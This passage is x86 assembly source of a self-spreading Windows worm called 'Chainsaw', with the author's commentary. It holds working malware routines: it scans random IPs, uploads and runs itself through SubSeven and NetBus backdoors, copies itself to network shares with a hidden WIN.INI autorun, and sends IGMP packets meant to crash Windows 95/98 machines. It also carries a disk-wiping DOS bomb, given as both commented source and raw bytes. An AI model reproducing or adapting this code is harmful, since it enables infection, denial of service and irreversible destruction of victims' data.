+ PUSH OFFSET Account_Index + PUSH 0 + PUSH 0 + PUSH OFFSET sz_Def_News_Acc + PUSH Reg_Handle_1 + CALL RegQueryValueExA + + OR EAX, EAX + JNZ Close_Reg_1 + + PUSH OFFSET Reg_Handle_2 ; Open the default news + PUSH KEY_QUERY_VALUE ; account. + PUSH 0 + PUSH OFFSET Account_Key + PUSH HKEY_CURRENT_USER + CALL RegOpenKeyExA + + OR EAX, EAX + JNZ Close_Reg_1 + + PUSH OFFSET Size_NNTP_Buf ; Get it's NNTP server. + PUSH OFFSET NNTP_Server + PUSH 0 + PUSH 0 + PUSH OFFSET sz_NNTP_Server + PUSH Reg_Handle_2 + CALL RegQueryValueExA + + OR EAX, EAX + JNZ Close_Reg_2 + + PUSH OFFSET NNTP_Server ; Convert the DNS-name to + CALL gethostbyname ; an IP-address. + + XCHG ECX, EAX + JECXZ Close_Reg_2 + + MOV ESI, [ECX+12] ; Fetch IP-address. + LODSD + PUSH DWORD PTR [EAX] + POP Usenet_IP + + PUSH 0 + PUSH SOCK_STREAM + PUSH AF_INET + CALL socket + + MOV News_Socket, EAX + + INC EAX ; Error? + JZ Close_Reg_2 + + MOV EBX, News_Socket + CALL Set_Time_Outs + + PUSH 16 + PUSH OFFSET Usenet_Conn + PUSH News_Socket + CALL connect + + INC EAX + JZ Close_Reg_2 + + MOV EDI, OFFSET Buffer + + PUSH 0 ; Receive data from the + PUSH 512 ; socket. + PUSH EDI + PUSH News_Socket + CALL recv + + INC EAX + JZ Close_News + + CMP BYTE PTR [EDI], '2' + JNE Send_QUIT + + PUSH 0 + PUSH 6 + PUSH OFFSET s_POST + PUSH News_Socket + CALL send + + INC EAX + JZ Close_News + + PUSH 0 ; Receive data from the + PUSH 512 ; socket. + PUSH EDI + PUSH News_Socket + CALL recv + + INC EAX + JZ Close_News + + CMP BYTE PTR [EDI], '3' + JNE Send_QUIT + + PUSH 0 + PUSH (End_News_Message-News_Message) + PUSH OFFSET News_Message + PUSH News_Socket + CALL send + + INC EAX + JZ Close_News + + PUSH 0 ; Receive data from the + PUSH 512 ; socket. + PUSH EDI + PUSH News_Socket + CALL recv + + INC EAX + JZ Close_News + +Send_QUIT: PUSH 0 + PUSH 6 + PUSH OFFSET s_QUIT + PUSH News_Socket + CALL send + + INC EAX + JZ Close_News + + PUSH 0 ; Receive data from the + PUSH 512 ; socket. 
+ PUSH EDI + PUSH News_Socket + CALL recv + +Close_News: PUSH News_Socket + CALL closesocket + +Close_Reg_2: PUSH Reg_Handle_2 + CALL RegCloseKey + +Close_Reg_1: PUSH Reg_Handle_1 + CALL RegCloseKey + +Do_Random_IP: CALL Random_AL_254 ; Get random octet (1-254). + + XCHG EBX, EAX + + CALL Random_AL_254 ; Another one. + + SHL EBX, 8 + MOV BL, AL + + CALL Random_AL_254 ; And another one. + + SHL EBX, 8 + MOV BL, AL + +Rand_A_Class: MOV AL, 223 ; Random A/B/C class IP. + CALL Random_AL + + CMP AL, 10 ; Private network segment. + JE Rand_A_Class + + CMP AL, 127 ; Localhost network. + JE Rand_A_Class + + SHL EBX, 8 + MOV BL, AL + + MOV Nuke_IP, EBX + MOV Sub7_IP, EBX ; Store the random IP in our + MOV NetBus_IP, EBX ; structures. + MOV NetBus_IP_2, EBX + MOV NetBios_IP, EBX + + PUSH OFFSET System_Time ; Get system date. + CALL GetSystemTime + + CMP System_Time+(3*2), 31 ; Is today nuke day? + JNE IP_To_ASCIIZ + + PUSH IPPROTO_IGMP ; Create a raw IGMP socket. + PUSH SOCK_RAW + PUSH AF_INET + CALL socket + + MOV IGMP_Socket, EAX + + INC EAX + JZ Do_Random_IP + + MOV EDI, 10 ; Send 10 nuke packets. + + ; Windows 95/98 has problems with handling fragmented IGMP + ; packets, when processing a whole bunch of these the system + ; will usually BSOD. Here we simply send a large packet (the + ; packet will arrive regardless of content it seems), which + ; will automatically be fragmented by the underlying TCP/IP + ; layers. Officially IGMP packets aren't supposed to leave + ; the current subnet, so if your ISP uses filtering (mainly + ; cable/ADSL connections), this nuke won't get through, + ; however SLIP/PPP connections (mainly dialups), seem to have + ; no problems delivering it. + +Send_Nuke: PUSH 16 ; Send the nuke. + PUSH OFFSET Nuke_Conn + PUSH 0 + PUSH 15000 + PUSH OFFSET IGMP_Nuke + PUSH IGMP_Socket + CALL sendto + + DEC EDI ; Send all 10 packets. 
+ JNZ Send_Nuke + +Exit_Nuke: PUSH IGMP_Socket + CALL closesocket + + JMP Do_Random_IP + +IP_To_ASCIIZ: PUSH EBX ; Convert DWORD to ASCIIZ + CALL inet_ntoa ; for the NetBios API's. + + XCHG ESI, EAX + MOV EDI, OFFSET NetBios_Remote+2 + + ; Copy the ASCIIZ IP to our own buffer. + +Copy_ASCIIZ_IP: LODSB + STOSB + + OR AL, AL ; Did entire ASCIIZ string? + JNZ Copy_ASCIIZ_IP + + PUSH 0 ; Create sockets. + PUSH SOCK_STREAM + PUSH AF_INET + CALL socket + + MOV Sub7_Socket, EAX + + INC EAX + JZ Chk_Inet_State + + PUSH 0 + PUSH SOCK_STREAM + PUSH AF_INET + CALL socket + + MOV NetBus_Socket, EAX + + INC EAX + JZ Close_Sub7 + + PUSH 0 + PUSH SOCK_STREAM + PUSH AF_INET + CALL socket + + MOV NetBios_Socket, EAX + + INC EAX + JZ Close_NetBus + + ; The standard connect() timeout interval is like 100 seconds + ; or so, obviously this is way to long for portscanning, so we + ; need to set our own timeout interval. Unfortunately Winsock + ; does not have any API that can set a connect() timeout interval + ; (neither does BSD Sockets btw). Kind of stupid, but anyways, + ; here we realize our own timeout function by first switching + ; the connect() sockets to non-blocking mode, and then running + ; select() on em with a 1500ms timeout to see if they are connected. + + PUSH OFFSET Boole_True ; Set socket to non-blocking + PUSH FIONBIO ; mode. + PUSH Sub7_Socket + CALL ioctlsocket + + PUSH OFFSET Boole_True + PUSH FIONBIO + PUSH NetBus_Socket + CALL ioctlsocket + + PUSH OFFSET Boole_True + PUSH FIONBIO + PUSH NetBios_Socket + CALL ioctlsocket + + PUSH 16 ; Connect SubSeven port. + PUSH OFFSET Sub7_Conn + PUSH Sub7_Socket + CALL connect + + PUSH 16 ; Connect NetBus port. + PUSH OFFSET NetBus_Conn + PUSH NetBus_Socket + CALL connect + + PUSH 16 ; Connect NetBios port. + PUSH OFFSET NetBios_Conn ; (only to quickly probe the + PUSH NetBios_Socket ; host for NetBios). 
+ CALL connect + + MOV ESI, OFFSET Select_Struc + MOV EDI, OFFSET Connect_Select + + MOVSD + MOVSD + MOVSD + MOVSD + + PUSH OFFSET Time_Out ; Check if any sockets are + PUSH 0 ; writeable (connected) + PUSH OFFSET Connect_Select ; within 1500ms. + PUSH 0 + PUSH 0 + CALL select + + INC EAX ; Error? + JZ Close_NetBios + + DEC EAX ; Zero sockets connected? + JZ Close_NetBios + + PUSH OFFSET Boole_False ; Switch sockets back to + PUSH FIONBIO ; blocking mode. + PUSH Sub7_Socket + CALL ioctlsocket + + PUSH OFFSET Boole_False + PUSH FIONBIO + PUSH NetBus_Socket + CALL ioctlsocket + + MOV EBX, Sub7_Socket ; Set send/recv timeout on + CALL Set_Time_Outs ; sockets to prevent endless + ; blocking. + MOV EBX, NetBus_Socket + CALL Set_Time_Outs + + MOV EDI, OFFSET Buffer ; recv-buffer. + +Try_Sub7: PUSH 0 ; Attempt to get SubSeven + PUSH 512 ; connection reply. + PUSH EDI + PUSH Sub7_Socket + CALL recv + + INC EAX ; Not connected? + JZ Try_NetBus + + ; If it's a SubSeven server, and not password + ; protected, it should reply with 'connected', + ; and the time/date and version. + + CMP [EDI], 'nnoc' ; If we can't access the Sub7 + JNE Try_NetBus ; server, move on to NetBus. + + ; First request a file upload by sending + ; 'RTF' with the upload path connected to + ; it: 'RTFChainsaw.exe'. + + PUSH 0 + PUSH (End_S7_Upload_Req-S7_Upload_Req) + PUSH OFFSET S7_Upload_Req + PUSH Sub7_Socket + CALL send + + INC EAX + JZ Try_NetBus + + PUSH 0 ; Fetch the reply, it should + PUSH 512 ; be 'TID' if all is OK. + PUSH EDI + PUSH Sub7_Socket + CALL recv + + INC EAX + JZ Try_NetBus + + CMP [EDI], 'nDIT' ; Check for 'TID' (plus last + JNE Try_NetBus ; byte of previous recv). + + ; First let the server know the filesize of the + ; upload, this is done by sending a 'SFT' + the + ; length of the filesize (represented by two + ; numbers) + the actual filesize: 'SFT046144'. 
+ + PUSH 0 + PUSH (End_S7_Upload_Size-S7_Upload_Size) + PUSH OFFSET S7_Upload_Size + PUSH Sub7_Socket + CALL send + + INC EAX + JZ Try_NetBus + + PUSH 0 ; Then send the actual file + PUSH Worm_Size ; contents. + PUSH OFFSET Worm_Code + PUSH Sub7_Socket + CALL send + + INC EAX + JZ Try_NetBus + + ; SubSeven works with a 1041-byte receive buffer, every + ; 1041 or less bytes received will be acknowledged with + ; a 'p:' + the total amount of bytes received + '.'. + +Retrieve_Ack: PUSH 0 ; Receive a 7-byte 'p:xxxx.' + PUSH 7 ; (don't read more than 7 + PUSH EDI ; bytes as often the data is + PUSH Sub7_Socket ; overlapping). + CALL recv + + INC EAX + JZ Try_NetBus + + CMP [EDI+2], '4416' ; Last acknowledgement? + JNE Retrieve_Ack ; Otherwise just go on. + + ; Check upload reply, which should be 'file successfully uploaded.' + ; if all went fine, (however it seems to return this regardless of + ; success or failure..). + +Check_UL_Reply: PUSH 0 + PUSH 512 + PUSH EDI + PUSH Sub7_Socket + CALL recv + + INC EAX + JZ Try_NetBus + + CMP [EDI+5], 'ccus' ; Check for 'success'. + JNE Try_NetBus ; Bail on error. + + ; Now remotely execute the uploaded worm copy by sending a + ; 'FMX' + the path of the file to execute: 'FMXChainsaw.exe'. + ; SubSeven uses ShellExecuteA to run files, so it is capable + ; of opening any registered file extension such as .VBS etc. + + PUSH 0 + PUSH (End_S7_Exec_Req-S7_Exec_Req) + PUSH OFFSET S7_Exec_Req + PUSH Sub7_Socket + CALL send + + INC EAX + JZ Try_NetBus + + PUSH 0 ; Fetch the command reply, + PUSH 512 ; which should be + PUSH EDI ; 'file has been executed.'. + PUSH Sub7_Socket + CALL recv + +Try_NetBus: PUSH 0 ; Fetch connection reply. + PUSH 512 + PUSH EDI + PUSH NetBus_Socket + CALL recv + + INC EAX + JZ Try_NetBios + + ; NetBus servers respond with 'NetBus', and + ; the version, and if the server is password + ; protected also with an 'x'. + + CMP [EDI], 'BteN' ; Is it an actual NetBus + JNE Try_NetBios ; server? 
+ + ; Server is password protected? + + CMP BYTE PTR [EDI+EAX-3], 'x' + JNE Upload_Worm + + ; Now try one password, 'netbus' (should be commonly used + ; I guess), together with a NetBus 1.60- backdoor function + ; that accepts any password. + + PUSH 0 + PUSH (End_NB_Password-NB_Password) + PUSH OFFSET NB_Password + PUSH NetBus_Socket + CALL send + + INC EAX + JZ Try_NetBios + + PUSH 0 ; Get password reply. + PUSH 512 + PUSH EDI + PUSH NetBus_Socket + CALL recv + + INC EAX + JZ Try_NetBios + + ; If the password got accepted then it + ; should return 'Access;1'. + + CMP [EDI+4], '1;ss' ; 'Access;1' ? + JNE Try_NetBios + + ; Request a file upload by sending 'UploadFile;' + ; + filename + ';' + filesize + ';' + upload path: + ; 'UploadFile;Chainsaw.exe;6144;\'. + +Upload_Worm: PUSH 0 + PUSH (End_NB_Upload_Req-NB_Upload_Req) + PUSH OFFSET NB_Upload_Req + PUSH NetBus_Socket + CALL send + + INC EAX + JZ Try_NetBios + + PUSH 0 ; Fetch upload reply which + PUSH 512 ; should be 'UploadReady'. + PUSH EDI + PUSH NetBus_Socket + CALL recv + + INC EAX + JZ Try_NetBios + + CMP [EDI+4], 'eRda' ; 'UploadReady' ? + JNE Try_NetBios + + ; Now connect to port number , + ; which will handle the upload file content. + + PUSH 0 ; Create a socket for the + PUSH SOCK_STREAM ; upload connection. + PUSH AF_INET + CALL socket + + MOV NetBus_Socket_2, EAX + + INC EAX + JZ Try_NetBios + + MOV EBX, NetBus_Socket_2 + CALL Set_Time_Outs + + PUSH 16 ; Connect the upload socket. + PUSH OFFSET NetBus_Conn_2 + PUSH NetBus_Socket_2 + CALL connect + + XCHG EBX, EAX + + OR EBX, EBX + JNZ Close_NetBus_2 + + PUSH 0 ; Send through the upload + PUSH Worm_Size ; file contents. + PUSH OFFSET Worm_Code + PUSH NetBus_Socket_2 + CALL send + + XCHG EBX, EAX + +Close_NetBus_2: PUSH NetBus_Socket_2 + CALL closesocket + + INC EBX + JZ Close_NetBios + + ; Now remotely execute the worm on the target's + ; system by sending 'StartApp;' + path to program: + ; 'StartApp;\Chainsaw.exe'. 
+ + PUSH 0 + PUSH (End_NB_Exec_File-NB_Exec_File) + PUSH OFFSET NB_Exec_File + PUSH NetBus_Socket + CALL send + +Try_NetBios: MOV ESI, OFFSET Net_Resource_Struc + MOV EDI, OFFSET Net_Resource + + MOV ECX, 8 + REP MOVSD + + CALL Locate_Shares ; Infect all shared drives. + +Close_NetBios: PUSH NetBios_Socket + CALL closesocket + +Close_NetBus: PUSH NetBus_Socket + CALL closesocket + +Close_Sub7: PUSH Sub7_Socket + CALL closesocket + + JMP Chk_Inet_State + + +; Set the recv/send timeout to 5 seconds to prevent endless blocking. +Set_Time_Outs: + PUSH 4 + PUSH OFFSET IO_Time_Out + PUSH SO_RCVTIMEO + PUSH SOL_SOCKET + PUSH EBX + CALL setsockopt + + PUSH 4 + PUSH OFFSET IO_Time_Out + PUSH SO_SNDTIMEO + PUSH SOL_SOCKET + PUSH EBX + CALL setsockopt + + RETN + + +Random_AL_254: + MOV AL, 254 + +Random_AL: MOVZX EAX, AL + +Random_EAX: PUSH EAX + + CALL GetTickCount + + ADD EAX, Random_Init + JNP Xor_In_Init + + RCL EAX, 2 + XCHG AL, AH + ADD AL, 66h + +Xor_In_Init: NOT EAX + + PUSH 32 + POP ECX + +CRC_Bit: SHR EAX, 1 + JNC Loop_CRC_Bit + + XOR EAX, 0EDB88320h + +Loop_CRC_Bit: LOOP CRC_Bit + + POP ECX + + XOR EDX, EDX + DIV ECX + + XCHG EDX, EAX + INC EAX ; Can't be zero. + + ROL Random_Init, 1 ; Adjust random seed. + + RETN + + +; And I thought NetBus was a lame buggy piece of shit, nothing beats +; SubSeven, even though it's the one of the most advanched RAT's +; available these days, it is programmed pretty badly, the author +; clearly has no understanding of TCP/IP whatsoever, he doesn't +; even terminate his TCP commands with a terminator for example, +; which will lead to fragmented packets fucking up. Also, when you +; supply wrong commands to the server, it will downright hang itself. +; And as a bonus, SubSeven infected systems become slooow, not sure +; exactly why.. I'd say, leave writing RAT's to people who know +; their stuff, like the authors of Back Orifice 2000. + + +; Recursively scans the host's resources for shared drives. 
+Locate_Shares: + PUSHAD + + PUSH OFFSET Enum_Handle ; Start enumerating all + PUSH OFFSET Net_Resource ; shared drives. + PUSH 0 + PUSH RESOURCETYPE_DISK + PUSH RESOURCE_GLOBALNET + CALL WNetOpenEnumA + + OR EAX, EAX + JNZ Exit_Loc_Share + + MOV EBX, Enum_Handle + +Enum_Resource: MOV Net_Struc_Count, 1 + + PUSH OFFSET Enum_Buf_Size ; Find shared drive. + PUSH OFFSET Net_Resource + PUSH OFFSET Net_Struc_Count + PUSH EBX + CALL WNetEnumResourceA + + OR EAX, EAX + JNZ Close_Enum + + CMP Net_Usage, RESOURCEUSAGE_CONTAINER + JNE Infect_Share + + CALL Locate_Shares + + JMP Enum_Resource + +Infect_Share: MOV Net_Local_Name, OFFSET Remote_Drive + + PUSH 0 ; Map the shared drive to + PUSH 0 ; 'T:'. + PUSH 0 + PUSH OFFSET Net_Resource + CALL WNetAddConnection2A + + OR EAX, EAX + JNZ Enum_Resource + + PUSH 1 ; Copy Chainsaw.exe to the + PUSH OFFSET Remote_Trojan ; root of this shared drive. + PUSH OFFSET Own_Path + CALL CopyFileA + + XCHG ECX, EAX + JECXZ Un_Map_Share + + PUSH OFFSET MsDos_Sys ; Attempt to get the Win9x + PUSH 260 ; directory. + PUSH OFFSET Win_Dir + PUSH OFFSET Default_String + PUSH OFFSET Win_Dir_Key + PUSH OFFSET Paths_Section + CALL GetPrivateProfileStringA + + XCHG ECX, EAX + JECXZ Un_Map_Share + + LEA EDI, [Win_Dir+ECX] ; Append '\WIN.INI' to it. + MOV ESI, OFFSET Slash_Win_Ini + MOV ECX, 9 + REP MOVSB + + PUSH OFFSET Win_Dir ; Add 'run=\Chainsaw.exe' to + PUSH OFFSET Root_Dropper ; Win9x's WIN.INI. + PUSH OFFSET Win_Ini_Run_Key + PUSH OFFSET Windows_Section + CALL WritePrivateProfileStringA + + XCHG ECX, EAX + JECXZ Un_Map_Share + + PUSH FILE_ATTRIBUTE_HIDDEN ; Hide the drop file. + PUSH OFFSET Remote_Trojan + CALL SetFileAttributesA + +Un_Map_Share: PUSH 0 ; Unmap shared drive. + PUSH 0 + PUSH OFFSET Remote_Drive + CALL WNetCancelConnection2A + + JMP Enum_Resource + +Close_Enum: PUSH EBX + CALL WNetCloseEnum + +Exit_Loc_Share: POPAD + + RETN + + +; Ima go woop yo ass boy! 
+Payload: + PUSH 0 + PUSH 0 + PUSH CREATE_ALWAYS + PUSH 0 + PUSH 0 + PUSH GENERIC_WRITE + PUSH OFFSET Nuke_File + CALL CreateFileA + + XCHG EBX, EAX + + PUSH 0 ; Write bomb. + PUSH OFFSET Temp + PUSH 666 + PUSH OFFSET DOS_Bomb + PUSH EBX + CALL WriteFile + + PUSH EBX + CALL CloseHandle + + PUSH 0 ; Run the bomb (only WinExec + PUSH OFFSET Nuke_File ; is capable of running DOS + CALL WinExec ; files too). + + JMP $ ; Heart stops.. + + + ; Bomb in DOS COM-format, this way it works both on 95/98 and NT/2K. + ; Smashes disk structures of 1st 2 fixed disks, should be fast and + ; unrecoverable. + +; .MODEL TINY +; .CODE +; +; ORG 100h +;START: +; MOV AX, 3513h ; Grab INT 13h's address. +; INT 21h +; +; MOV Int13h, BX ; Store it for later. +; MOV Int13h+2, ES +; +; PUSH CS +; POP ES +; +; XOR SI, SI +; +; MOV BX, OFFSET Trash_Text +; MOV CX, (End_Trash_Text-Trash_Text) +; +; ; Decrypt trash text. +; +;Decrypt_Text: XOR BYTE PTR [BX+SI], 66h +; +; INC SI +; +; LOOP Decrypt_Text +; +; INC CX ; CX = 0001h. +; +; MOV DX, 80h+1 ; Start trashing backwards +; ; from 2nd HDD. +; +;Kill_Head: MOV AX, 0302h ; Smash 2 sectors of track +; PUSHF ; 0 with our text. +; DB 9Ah +;Int13h DW 0, 0 +; +; INC DH ; Smashed all heads? +; JNZ Kill_Head +; +; DEC DL ; Smashed all HDD's ? +; JS Kill_Head +; +;Exit: RETN ; Back to Windoze.. +; +; DB 'T2' ; To pad this file to 666. +; +; ; XOR 66h encrypted: +; +; ; "THE FILM WHICH YOU ARE ABOUT TO SEE IS AN ACCOUNT OF THE +; ; TRAGEDY WHICH BEFELL A GROUP OF FIVE YOUTHS. IN PARTICULAR +; ; SALLY HARDESTY AND HER INVALID BROTHER FRANKLIN. IT IS ALL +; ; THE MORE TRAGIC IN THAT THEY WERE YOUNG. BUT, HAD THEY +; ; LIVED VERY, VERY LONG LIVES, THEY COULD NOT HAVE EXPECTED +; ; NOR WOULD THEY HAVE WISHED TO SEE AS MUCH OF THE MAD AND +; ; MACABRE AS THEY WERE TO SEE THAT DAY. FOR THEM AN IDYLLIC +; ; SUMMER AFTERNOON DRIVE BECAME A NIGHTMARE. 
THE EVENTS OF +; ; THAT DAY WERE TO LEAD TO THE DISCOVERY OF ONE OF THE MOST +; ; BIZARRE CRIMES IN THE ANNALS OF AMERICAN HISTORY, +; ; THE TEXAS CHAIN SAW MASSACRE..." +; +; ; (I adore this movie :) +; +;Trash_Text: DB 44h, 32h, 2Eh, 23h, 46h, 20h, 2Fh, 2Ah, 2Bh, 46h +; DB 31h, 2Eh, 2Fh, 25h, 2Eh, 46h, 3Fh, 29h, 33h, 46h +; DB 27h, 34h, 23h, 46h, 27h, 24h, 29h, 33h, 32h, 46h +; DB 32h, 29h, 46h, 35h, 23h, 23h, 46h, 2Fh, 35h, 46h +; DB 27h, 28h, 46h, 27h, 25h, 25h, 29h, 33h, 28h, 32h +; DB 46h, 29h, 20h, 46h, 32h, 2Eh, 23h, 6Bh, 6Ch, 32h +; DB 34h, 27h, 21h, 23h, 22h, 3Fh, 46h, 31h, 2Eh, 2Fh +; DB 25h, 2Eh, 46h, 24h, 23h, 20h, 23h, 2Ah, 2Ah, 46h +; DB 27h, 46h, 21h, 34h, 29h, 33h, 36h, 46h, 29h, 20h +; DB 46h, 20h, 2Fh, 30h, 23h, 46h, 3Fh, 29h, 33h, 32h +; DB 2Eh, 35h, 48h, 46h, 2Fh, 28h, 46h, 36h, 27h, 34h +; DB 32h, 2Fh, 25h, 33h, 2Ah, 27h, 34h, 6Bh, 6Ch, 35h +; DB 27h, 2Ah, 2Ah, 3Fh, 46h, 2Eh, 27h, 34h, 22h, 23h +; DB 35h, 32h, 3Fh, 46h, 27h, 28h, 22h, 46h, 2Eh, 23h +; DB 34h, 46h, 2Fh, 28h, 30h, 27h, 2Ah, 2Fh, 22h, 46h +; DB 24h, 34h, 29h, 32h, 2Eh, 23h, 34h, 46h, 20h, 34h +; DB 27h, 28h, 2Dh, 2Ah, 2Fh, 28h, 48h, 46h, 2Fh, 32h +; DB 46h, 2Fh, 35h, 46h, 27h, 2Ah, 2Ah, 6Bh, 6Ch, 32h +; DB 2Eh, 23h, 46h, 2Bh, 29h, 34h, 23h, 46h, 32h, 34h +; DB 27h, 21h, 2Fh, 25h, 46h, 2Fh, 28h, 46h, 32h, 2Eh +; DB 27h, 32h, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 31h, 23h +; DB 34h, 23h, 46h, 3Fh, 29h, 33h, 28h, 21h, 48h, 46h +; DB 24h, 33h, 32h, 4Ah, 46h, 2Eh, 27h, 22h, 46h, 32h +; DB 2Eh, 23h, 3Fh, 6Bh, 6Ch, 2Ah, 2Fh, 30h, 23h, 22h +; DB 46h, 30h, 23h, 34h, 3Fh, 4Ah, 46h, 30h, 23h, 34h +; DB 3Fh, 46h, 2Ah, 29h, 28h, 21h, 46h, 2Ah, 2Fh, 30h +; DB 23h, 35h, 4Ah, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 25h +; DB 29h, 33h, 2Ah, 22h, 46h, 28h, 29h, 32h, 46h, 2Eh +; DB 27h, 30h, 23h, 46h, 23h, 3Eh, 36h, 23h, 25h, 32h +; DB 23h, 22h, 6Bh, 6Ch, 28h, 29h, 34h, 46h, 31h, 29h +; DB 33h, 2Ah, 22h, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 2Eh +; DB 27h, 30h, 23h, 46h, 31h, 2Fh, 35h, 2Eh, 23h, 22h +; DB 46h, 32h, 29h, 
46h, 35h, 23h, 23h, 46h, 27h, 35h +; DB 46h, 2Bh, 33h, 25h, 2Eh, 46h, 29h, 20h, 46h, 32h +; DB 2Eh, 23h, 46h, 2Bh, 27h, 22h, 46h, 27h, 28h, 22h +; DB 6Bh, 6Ch, 2Bh, 27h, 25h, 27h, 24h, 34h, 23h, 46h +; DB 27h, 35h, 46h, 32h, 2Eh, 23h, 3Fh, 46h, 31h, 23h +; DB 34h, 23h, 46h, 32h, 29h, 46h, 35h, 23h, 23h, 46h +; DB 32h, 2Eh, 27h, 32h, 46h, 22h, 27h, 3Fh, 48h, 46h +; DB 20h, 29h, 34h, 46h, 32h, 2Eh, 23h, 2Bh, 46h, 27h +; DB 28h, 46h, 2Fh, 22h, 3Fh, 2Ah, 2Ah, 2Fh, 25h, 6Bh +; DB 6Ch, 35h, 33h, 2Bh, 2Bh, 23h, 34h, 46h, 27h, 20h +; DB 32h, 23h, 34h, 28h, 29h, 29h, 28h, 46h, 22h, 34h +; DB 2Fh, 30h, 23h, 46h, 24h, 23h, 25h, 27h, 2Bh, 23h +; DB 46h, 27h, 46h, 28h, 2Fh, 21h, 2Eh, 32h, 2Bh, 27h +; DB 34h, 23h, 48h, 46h, 32h, 2Eh, 23h, 46h, 23h, 30h +; DB 23h, 28h, 32h, 35h, 46h, 29h, 20h, 6Bh, 6Ch, 32h +; DB 2Eh, 27h, 32h, 46h, 22h, 27h, 3Fh, 46h, 31h, 23h +; DB 34h, 23h, 46h, 32h, 29h, 46h, 2Ah, 23h, 27h, 22h +; DB 46h, 32h, 29h, 46h, 32h, 2Eh, 23h, 46h, 22h, 2Fh +; DB 35h, 25h, 29h, 30h, 23h, 34h, 3Fh, 46h, 29h, 20h +; DB 46h, 29h, 28h, 23h, 46h, 29h, 20h, 46h, 32h, 2Eh +; DB 23h, 46h, 2Bh, 29h, 35h, 32h, 6Bh, 6Ch, 24h, 2Fh +; DB 3Ch, 27h, 34h, 34h, 23h, 46h, 25h, 34h, 2Fh, 2Bh +; DB 23h, 35h, 46h, 2Fh, 28h, 46h, 32h, 2Eh, 23h, 46h +; DB 27h, 28h, 28h, 27h, 2Ah, 35h, 46h, 29h, 20h, 46h +; DB 27h, 2Bh, 23h, 34h, 2Fh, 25h, 27h, 28h, 46h, 2Eh +; DB 2Fh, 35h, 32h, 29h, 34h, 3Fh, 4Ah, 6Bh, 6Ch, 32h +; DB 2Eh, 23h, 46h, 32h, 23h, 3Eh, 27h, 35h, 46h, 25h +; DB 2Eh, 27h, 2Fh, 28h, 46h, 35h, 27h, 31h, 46h, 2Bh +; DB 27h, 35h, 35h, 27h, 25h, 34h, 23h, 48h, 48h, 48h +; DB 44h, 6Bh, 6Ch +;End_Trash_Text: +; END START + +DOS_Bomb: DB 0B8h, 013h, 035h, 0CDh, 021h, 089h, 01Eh, 026h, 001h + DB 08Ch, 006h, 028h, 001h, 00Eh, 007h, 033h, 0F6h, 0BBh + DB 035h, 001h, 0B9h, 065h, 002h, 080h, 030h, 066h, 046h + DB 0E2h, 0FAh, 041h, 0BAh, 081h, 000h, 0B8h, 002h, 003h + DB 09Ch, 09Ah, 000h, 000h, 000h, 000h, 0FEh, 0C6h, 075h + DB 0F3h, 0FEh, 0CAh, 078h, 0EFh, 0C3h, 054h, 032h, 044h + DB 032h, 
02Eh, 023h, 046h, 020h, 02Fh, 02Ah, 02Bh, 046h + DB 031h, 02Eh, 02Fh, 025h, 02Eh, 046h, 03Fh, 029h, 033h + DB 046h, 027h, 034h, 023h, 046h, 027h, 024h, 029h, 033h + DB 032h, 046h, 032h, 029h, 046h, 035h, 023h, 023h, 046h + DB 02Fh, 035h, 046h, 027h, 028h, 046h, 027h, 025h, 025h + DB 029h, 033h, 028h, 032h, 046h, 029h, 020h, 046h, 032h + DB 02Eh, 023h, 06Bh, 06Ch, 032h, 034h, 027h, 021h, 023h + DB 022h, 03Fh, 046h, 031h, 02Eh, 02Fh, 025h, 02Eh, 046h + DB 024h, 023h, 020h, 023h, 02Ah, 02Ah, 046h, 027h, 046h + DB 021h, 034h, 029h, 033h, 036h, 046h, 029h, 020h, 046h + DB 020h, 02Fh, 030h, 023h, 046h, 03Fh, 029h, 033h, 032h + DB 02Eh, 035h, 048h, 046h, 02Fh, 028h, 046h, 036h, 027h + DB 034h, 032h, 02Fh, 025h, 033h, 02Ah, 027h, 034h, 06Bh + DB 06Ch, 035h, 027h, 02Ah, 02Ah, 03Fh, 046h, 02Eh, 027h + DB 034h, 022h, 023h, 035h, 032h, 03Fh, 046h, 027h, 028h + DB 022h, 046h, 02Eh, 023h, 034h, 046h, 02Fh, 028h, 030h + DB 027h, 02Ah, 02Fh, 022h, 046h, 024h, 034h, 029h, 032h + DB 02Eh, 023h, 034h, 046h, 020h, 034h, 027h, 028h, 02Dh + DB 02Ah, 02Fh, 028h, 048h, 046h, 02Fh, 032h, 046h, 02Fh + DB 035h, 046h, 027h, 02Ah, 02Ah, 06Bh, 06Ch, 032h, 02Eh + DB 023h, 046h, 02Bh, 029h, 034h, 023h, 046h, 032h, 034h + DB 027h, 021h, 02Fh, 025h, 046h, 02Fh, 028h, 046h, 032h + DB 02Eh, 027h, 032h, 046h, 032h, 02Eh, 023h, 03Fh, 046h + DB 031h, 023h, 034h, 023h, 046h, 03Fh, 029h, 033h, 028h + DB 021h, 048h, 046h, 024h, 033h, 032h, 04Ah, 046h, 02Eh + DB 027h, 022h, 046h, 032h, 02Eh, 023h, 03Fh, 06Bh, 06Ch + DB 02Ah, 02Fh, 030h, 023h, 022h, 046h, 030h, 023h, 034h + DB 03Fh, 04Ah, 046h, 030h, 023h, 034h, 03Fh, 046h, 02Ah + DB 029h, 028h, 021h, 046h, 02Ah, 02Fh, 030h, 023h, 035h + DB 04Ah, 046h, 032h, 02Eh, 023h, 03Fh, 046h, 025h, 029h + DB 033h, 02Ah, 022h, 046h, 028h, 029h, 032h, 046h, 02Eh + DB 027h, 030h, 023h, 046h, 023h, 03Eh, 036h, 023h, 025h + DB 032h, 023h, 022h, 06Bh, 06Ch, 028h, 029h, 034h, 046h + DB 031h, 029h, 033h, 02Ah, 022h, 046h, 032h, 02Eh, 023h + DB 03Fh, 046h, 02Eh, 027h, 030h, 
